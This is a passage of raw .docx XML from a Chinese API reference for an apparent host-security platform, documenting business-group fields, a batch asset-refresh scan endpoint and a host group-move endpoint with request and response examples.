            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A6B5BF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组关系名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>（即从顶层业务组到当前业务组的全路径名）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3842100B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306BE460" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36250241" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D4471D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB8F2A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C0A7088" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596E36E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="743C617A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B747C4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED1A742" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>平台（１:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>， ２:windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="282E45BB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178BFE48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A6C0B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483BD491" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A569F69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1235CE75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc115166156"/>
      <w:bookmarkStart w:id="164" w:name="全部资产批量更新扫描"/>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>全部资产批量更新扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="353E28D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于批量请求资产信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1546A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00229A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C3B58"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1339"/>
        <w:gridCol w:w="4281"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DC121B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BBD9129" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7276A4D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C9EA8DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BFAE1C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7536635B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="428E952A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FD56E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围类型（0：全部主机 1：agent 2:group）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DA7CB7E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B4B329" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494A0F53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393ABE6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标识业务组的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DC26B60" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4936523A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43FD506A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6802C813" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="369E1FFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DE5C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "type":1,   // 0 全部主机 1 agent 2 group</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group":[],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":["94e4c7a4f5dec750"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4FE53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD99E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C543E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9BADF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用3.1查询状态接口，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>satus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012D654" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB51BC7"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77F74ACD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD8C70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01892A"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3D2458B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BF8005A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04324C59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A7A908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730C624F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45FDB414" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366BA95D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B4D228F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3933B69E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF1B01B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30F24CEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc115166157"/>
      <w:bookmarkStart w:id="166" w:name="移动主机业务组"/>
      <w:bookmarkEnd w:id="164"/>
      <w:r>
        <w:t>移动主机业务组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="5A7D8B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于批量修改主机的业务组。由于修改业务</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>对服务性能会产生较大的消耗，每30分钟最多修改5000主机的业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51BD01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC9FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>batch_move_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C1F9199"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1220"/>
        <w:gridCol w:w="3266"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="31E661D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2218043" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A425078" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D160C65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55EC7F5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E439B0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329FC219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E60F7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统（1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2:windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F4E8388" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDE9D33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334190E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7560028B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标识业务组的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C029B27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0218EE1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1173DC87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DFE28A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B070AE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839EA53"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osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
